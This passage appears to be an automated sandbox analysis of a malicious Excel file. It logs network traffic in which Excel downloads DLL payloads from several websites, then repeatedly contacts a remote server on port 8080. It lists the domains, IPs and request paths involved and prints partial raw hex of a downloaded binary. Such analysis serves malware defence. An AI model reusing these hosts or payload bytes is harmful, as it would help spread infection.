                                  May 23, 2022 09:50:16.966727972 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966736078 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.966768026 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966772079 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.966806889 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966824055 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.966849089 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966880083 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.966888905 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966892958 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.966928959 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966933012 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.966969967 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.966974974 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967008114 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967012882 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967046976 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967051029 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967087030 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967089891 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967123985 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967130899 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967164040 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967165947 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967201948 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967205048 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967241049 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.967245102 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.967283964 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.969223022 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:21.632632017 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:21.632802963 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:27.622185946 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:27.622497082 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:34.305088043 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:34.347640991 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:34.348690987 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:34.417876005 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:34.460535049 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:34.471276045 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:34.471318960 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:34.471422911 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:34.497895002 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:34.542361975 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:34.546514988 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.582777023 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.632564068 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.669539928 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.676570892 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.676815987 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.736614943 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.779522896 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.791050911 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.791090965 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.791254044 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.791327000 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.803088903 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.841494083 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.846841097 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:37.847788095 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:37.847944975 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:38.494793892 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:38.577752113 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:38.743412018 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:38.744263887 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:38.973982096 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.017025948 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:39.017321110 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.083676100 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.126523018 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:39.146867037 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:39.146920919 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:39.147300005 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.163862944 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.208808899 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:39.209141016 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.811961889 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:39.897854090 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:40.062218904 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:40.062314987 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:40.841779947 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:40.841824055 CEST808049175165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:40.841844082 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:40.841881037 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:41.744347095 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:41.744386911 CEST808049177165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:41.744554043 CEST491778080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:43.062465906 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:43.062486887 CEST808049178165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:43.062546968 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:43.062608004 CEST491788080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:47.942405939 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:47.986385107 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:47.986480951 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.040631056 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.084033012 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:48.095758915 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:48.095793962 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:48.095863104 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.095900059 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.107378960 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.151937008 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:48.152024984 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.866286039 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:48.949822903 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:49.116034031 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:49.117805004 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:50:52.116154909 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:52.116177082 CEST808049179165.22.73.229192.168.2.22
                                  May 23, 2022 09:50:52.116228104 CEST491798080192.168.2.22165.22.73.229
                                  May 23, 2022 09:52:01.764139891 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:01.764487028 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:01.764569044 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:01.764760971 CEST4917180192.168.2.22103.171.181.223
                                  May 23, 2022 09:52:02.086635113 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:02.088311911 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:02.195732117 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:02.336129904 CEST4917180192.168.2.22103.171.181.223
                                  May 23, 2022 09:52:02.695002079 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:02.695041895 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:02.866624117 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:03.459597111 CEST4917180192.168.2.22103.171.181.223
                                  May 23, 2022 09:52:03.896275997 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:03.896281004 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:04.192733049 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:05.721762896 CEST4917180192.168.2.22103.171.181.223
                                  May 23, 2022 09:52:06.345850945 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:06.348484039 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:06.844976902 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:10.214876890 CEST4917180192.168.2.22103.171.181.223
                                  May 23, 2022 09:52:11.151077986 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:11.154851913 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:12.133949041 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:19.185744047 CEST4917180192.168.2.22103.171.181.223
                                  May 23, 2022 09:52:20.761521101 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:52:20.761634111 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:52:22.727188110 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:52:24.040230036 CEST491758080192.168.2.22165.22.73.229
                                  May 23, 2022 09:52:24.040267944 CEST491758080192.168.2.22165.22.73.229

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 23, 2022 09:50:01.881863117 CEST5586853192.168.2.228.8.8.8
                                  May 23, 2022 09:50:02.273823977 CEST53558688.8.8.8192.168.2.22
                                  May 23, 2022 09:50:06.393023968 CEST4968853192.168.2.228.8.8.8
                                  May 23, 2022 09:50:06.421401978 CEST53496888.8.8.8192.168.2.22
                                  May 23, 2022 09:50:10.200681925 CEST5883653192.168.2.228.8.8.8
                                  May 23, 2022 09:50:10.369116068 CEST53588368.8.8.8192.168.2.22
                                  May 23, 2022 09:50:13.578142881 CEST5013453192.168.2.228.8.8.8
                                  May 23, 2022 09:50:13.687604904 CEST53501348.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  May 23, 2022 09:50:01.881863117 CEST192.168.2.228.8.8.80xd04fStandard query (0)learnviaonline.comA (IP address)IN (0x0001)
                                  May 23, 2022 09:50:06.393023968 CEST192.168.2.228.8.8.80xff53Standard query (0)kolejleri.comA (IP address)IN (0x0001)
                                  May 23, 2022 09:50:10.200681925 CEST192.168.2.228.8.8.80x90dcStandard query (0)stainedglassexpress.comA (IP address)IN (0x0001)
                                  May 23, 2022 09:50:13.578142881 CEST192.168.2.228.8.8.80xa812Standard query (0)milanstaffing.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 23, 2022 09:50:02.273823977 CEST8.8.8.8192.168.2.220xd04fNo error (0)learnviaonline.com103.171.181.223A (IP address)IN (0x0001)
                                  May 23, 2022 09:50:06.421401978 CEST8.8.8.8192.168.2.220xff53No error (0)kolejleri.com85.114.142.153A (IP address)IN (0x0001)
                                  May 23, 2022 09:50:10.369116068 CEST8.8.8.8192.168.2.220x90dcNo error (0)stainedglassexpress.com66.71.247.68A (IP address)IN (0x0001)
                                  May 23, 2022 09:50:13.687604904 CEST8.8.8.8192.168.2.220xa812No error (0)milanstaffing.com107.189.3.39A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • learnviaonline.com
                                  • kolejleri.com
                                  • stainedglassexpress.com
                                  • milanstaffing.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249171103.171.181.22380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  May 23, 2022 09:50:02.445317984 CEST2OUTGET /wp-admin/qGb/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: learnviaonline.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:03.381975889 CEST3INHTTP/1.1 200 OK
                                  Date: Mon, 23 May 2022 07:50:02 GMT
                                  Server: Apache
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 23 May 2022 07:50:03 GMT
                                  Content-Disposition: attachment; filename="Jf8.dll"
                                  Content-Transfer-Encoding: binary
                                  Set-Cookie: 628b3cab47229=1653292203; expires=Mon, 23-May-2022 07:51:03 GMT; Max-Age=60; path=/
                                  Last-Modified: Mon, 23 May 2022 07:50:03 GMT
                                  Content-Length: 371200
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEd{b" 5@P .text `.rdata4 @@.data7@.pdata@@.rsrc@@.reloc@B
                                  May 23, 2022 09:50:03.382035017 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: H\$Hl$Ht$WH0IHH
                                  May 23, 2022 09:50:03.382078886 CEST6INData Raw: c7 45 f4 27 4c 03 23 c7 45 f8 93 03 41 1d c7 45 fc 09 3a 50 74 c7 45 00 fe 27 4e 38 c7 45 04 31 3e 23 4a c7 45 08 b3 10 75 4a c7 45 0c 40 2c 3a 0c c7 45 10 f1 35 75 13 c7 45 14 50 06 0d 4b c7 45 18 ac 04 e3 73 c7 45 1c 08 23 20 80 c7 45 20 20 c1
                                  Data Ascii: E'L#EAE:PtE'N8E1>#JEuJE@,:E5uEPKEsE# E )E$Ee&E(r#E,4XE0AE4pE8$ /E<@"/E@$ED 5.EHAELPEP"_ET<3EX39E\xE`]^Ed@Eh2('El -EpD|_Et/1Ex{;E|3
                                  May 23, 2022 09:50:03.382119894 CEST8INData Raw: 02 00 00 36 24 12 2d c7 85 38 02 00 00 ee 70 95 0c c7 85 3c 02 00 00 0c 52 02 90 c7 85 40 02 00 00 14 8e 07 3b c7 85 44 02 00 00 24 04 53 8a c7 85 48 02 00 00 13 f9 55 14 c7 85 4c 02 00 00 15 db 41 dc c7 85 50 02 00 00 a5 6c 4f 29 c7 85 54 02 00
                                  Data Ascii: 6$-8p<R@;D$SHULAPlO)T'J:XA!\:-ZZ`'Npd%2[h0-RlAipN7#6tY&xV|?-mDDCw_>zT
                                  May 23, 2022 09:50:03.389375925 CEST9INData Raw: 85 4c 04 00 00 64 1e ea 16 c7 85 50 04 00 00 88 48 ea da c7 85 54 04 00 00 c1 3e 74 54 c7 85 58 04 00 00 10 89 e4 c6 c7 85 5c 04 00 00 c3 d9 36 71 c7 85 60 04 00 00 51 17 b1 18 c7 85 64 04 00 00 9d 6c 68 36 c7 85 68 04 00 00 3b a8 23 ae c7 85 6c
                                  Data Ascii: LdPHT>tTX\6q`Qdlh6h;#l-p"mtHxd|6uzJ\Ng(kjQCeMh5cjAkt}8#5
                                  May 23, 2022 09:50:03.389420033 CEST10INData Raw: 22 c7 85 64 06 00 00 e7 0c 61 dc c7 85 68 06 00 00 97 ff 9c 44 c7 85 6c 06 00 00 74 89 4a 4d c7 85 70 06 00 00 56 ba c7 30 c7 85 74 06 00 00 52 91 79 69 c7 85 78 06 00 00 b4 60 e6 4d c7 85 7c 06 00 00 eb 64 ea 05 c7 85 80 06 00 00 dc 57 24 42 c7
                                  Data Ascii: "dahDltJMpV0tRyix`M|dW$BxDt6rn&.5%Y\?0,'aPKxI)5JgWTQv}Np}3
                                  May 23, 2022 09:50:03.389571905 CEST12INData Raw: c4 12 48 c7 85 7c 08 00 00 d4 ec 01 5a c7 85 80 08 00 00 a6 af 70 56 c7 85 84 08 00 00 96 0c b5 91 c7 85 88 08 00 00 56 16 3f ae c7 85 8c 08 00 00 89 78 9c 98 c7 85 90 08 00 00 2e 3e a1 14 c7 85 94 08 00 00 77 82 20 4e c7 85 98 08 00 00 ad a3 6a
                                  Data Ascii: H|ZpVV?x.>w NjI"WzA8#'4+kAkD}LhH#FUWM6|jb(/N
                                  May 23, 2022 09:50:03.389645100 CEST13INData Raw: 98 16 c7 85 90 0a 00 00 da 7c 50 57 c7 85 94 0a 00 00 98 3f 36 8d c7 85 98 0a 00 00 59 fa 22 70 c7 85 9c 0a 00 00 10 d8 76 76 c7 85 a0 0a 00 00 2b 2b a3 ca c7 85 a4 0a 00 00 6f b4 28 52 c7 85 a8 0a 00 00 94 ac 67 7e c7 85 ac 0a 00 00 a8 00 a2 69
                                  Data Ascii: |PW?6Y"pvv++o(Rg~iC"syvA)3HuH"E3E3FH$A@A0H$L$HHHt3AH
                                  May 23, 2022 09:50:03.389687061 CEST15INData Raw: 07 33 c0 e9 a9 01 00 00 e8 5e 09 00 00 85 c0 75 0c e8 f5 54 00 00 33 c0 e9 94 01 00 00 e8 f9 53 00 00 ff 15 6b ec 01 00 48 89 05 9c b3 02 00 e8 77 52 00 00 48 89 05 d8 8f 02 00 e8 3b 42 00 00 85 c0 7d 11 e8 f2 09 00 00 e8 bd 54 00 00 33 c0 e9 5c
                                  Data Ascii: 3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk|$XuY=X~DPH=]u<eH`+TH|$`u={{t
                                  May 23, 2022 09:50:03.389728069 CEST16INData Raw: 00 8b 40 48 89 44 24 30 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 88 00 00 00 8b 00 39 44 24 30 0f 83 b6 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c 24 88 00 00 00 8b 44 01 04 48 39 44 24 68 0f 82 92 01 00 00 8b 44 24 30 48 6b c0 10 48 8b 8c
                                  Data Ascii: @HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H3D$0HkH$DHD$xHD$pH$HL$8T$pD$H|$H}3|$H
                                  May 23, 2022 09:50:03.538484097 CEST18INData Raw: 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 76 f7 01 00 48 89 88 a0 00 00 00 48 8b 44 24 30 c7 40 10 00 00 00 00 48 8b 44 24 30 c7 40 1c 01 00 00 00 48 8b 44 24 30 c7 80 c8 00 00 00 01 00 00 00 48 8b 44 24 30 c6 80 74 01 00 00 43 48 8b 44 24 30 c6 80
                                  Data Ascii: H(HD$0HvHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL$8HHD$0HuHD$0H"xHHD$0HzT?TH(


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.224917285.114.142.15380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  May 23, 2022 09:50:06.452677011 CEST392OUTGET /wp-admin/REvup/ HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: kolejleri.com
                                  Connection: Keep-Alive
                                  May 23, 2022 09:50:06.527494907 CEST393INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Mon, 23 May 2022 07:50:06 GMT
                                  Content-Type: application/x-msdownload
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Powered-By: PHP/7.4.29
                                  Cache-Control: no-cache, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 23 May 2022 07:50:06 GMT
                                  Content-Disposition: attachment; filename="4HWP0KQI.dll"
                                  Content-Transfer-Encoding: binary
                                  Set-Cookie: 628b3cae78674=1653292206; expires=Mon, 23-May-2022 07:51:06 GMT; Max-Age=60; path=/
                                  Last-Modified: Mon, 23 May 2022 07:50:06 GMT
                                  Vary: Accept-Encoding,User-Agent
                                  Content-Encoding: gzip
                                  Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 7c 53 c5 f6 00 8e df a4 09 84 d2 92 00 2d 94 3d 40 81 22 5b 15 d4 22 54 53 2c 7a 2b 05 0b 02 56 45 2d b2 55 41 ad 90 40 55 40 6a 5a a5 86 6a 55 54 f4 b9 e0 8e 3b 4f 11 81 87 da 02 92 82 f8 44 dc d0 87 8a fb 8d 41 c5 95 ba 35 ff b3 cc dc 7b 73 93 a2 be f7 fd fd ff ff cf ff f3 e7 3d 9b 73 67 3d 73 e6 cc 99 33 33 67 ce 4c 3c b7 5e 49 51 14 c5 01 ff c5 62 8a b2 49 e1 7f 3e e5 cf ff 69 f0 5f 87 3e 5b 3a 28 1b da bd d6 77 93 ad f8 b5 be 53 cb 2f 5e e4 ad 58 78 f9 bc 85 33 2f f5 ce 9a 79 d9 65 97 fb bd 17 cd f1 2e 0c 5c e6 bd f8 32 6f e1 99 67 79 2f bd 7c f6 9c e1 e9 e9 a9 d9 a2 8c 3b 9f 6b 9b f7 c1 be 8b e7 cb ff 9e 7d 68 fb fc 20 fd 1e 99 ff 2e fc be f5 f8 af f3 df a7 b8 f2 f9 d5 14 be 6d fe cf f4 fb fd fc 03 f4 fb 83 f8 fd 91 7e a7 5c 3c ab 1c cb b1 e2 5a 32 5e 51 66 5f d7 46 f9 e9 ea eb 2f 92 61 87 95 7e de f6 f6 54 68 bc 5d 51 1e 48 a1 b0 15 c7 c3 1f 0f 83 36 45 c0 10 ed c4 3f 8a f1 ab 28 6d 88 68 e1 5e 6d 20 c4 67 93 99 e4 4f e2 37 83 eb 1f b7 2b d5 f0 fb d9 fd 76 a5 84 42 53 94 df 23 50 e6 61 bb b2 c7 6d 42 f8 b0 53 59 6d 57 fe fe 3f af 5d 59 73 94 7c c3 fd 73 2a fd f0 fb 6b 8a 9d 11 c2 b6 3b 2c 45 28 4a d9 f0 85 b3 67 fa 67 2a ca a8 10 97 a9 ac 82 5f 57 7c c1 3e f8 ff 70 4e a6 ac 39 11 1b 07 f1 19 f0 bb 3a 21 5d c3 f0 0a 4e 48 6d 3c 2c ea 5e 97 a4 bc 85 8b 16 ce 02 98 68 82 9c f9 15 fc 6e 4a 96 6e ce 82 cb 21 e1 ef 6d 14 a2 95 e2 82 df 07 9c d6 74 e3 5a a7 c4 ff ff 1f fe 53 6b 67 64 bb d4 da 05 d9 1e b5 d6 9f 9d 75 b6 1a 3c 94 5b 14 da af 86 be 57 43 91 58 e6 d7 6e bb 32 7e e4 ae e2 d0 2b 05 75 93 6d a1 26 48 9d 83 09 bd b1 cc dd 10 35 b2 41 0d ee 8a a9 a1 96 ef 9f 56 43 db d5 23 6f a8 b1 5d ea 90 46 35 d8 6c 5f d4 76 93 d3 a7 ac 88 e6 ee 74 1c eb 55 63 8d 6a dd d8 63 87 bc 17 cb fc 87 5e 62 a8 09 ca b4 73 89 4b b1 c4 0a 2e 31 34 23 db a7 86 16 64 ab 6a c8 9f 5d a2 06 77 e4 5e b8 7d 8f fc 47 f8 22 96 25 6a c8 79 f6 7d 76 45 1d b9 43 ad 2d c4 c4 5b b3 57 60 83 42 bb d5 d0 fb b1 29 9e e2 ba e2 ec bc 82 4d 1e 0a db ab d6 15 66 e7 aa a1 57 31 ad 37 76 56 56 4d 83 5f 20 d8 33 b8 34 3b d7 13 f8 be 38 54 9d bd 12 13 63 3e 35 f4 ae f6 71 4b 0c 9a 56 0c 45 8f dc a3 4d ed 8b c5 cc c8 2e 03 7c 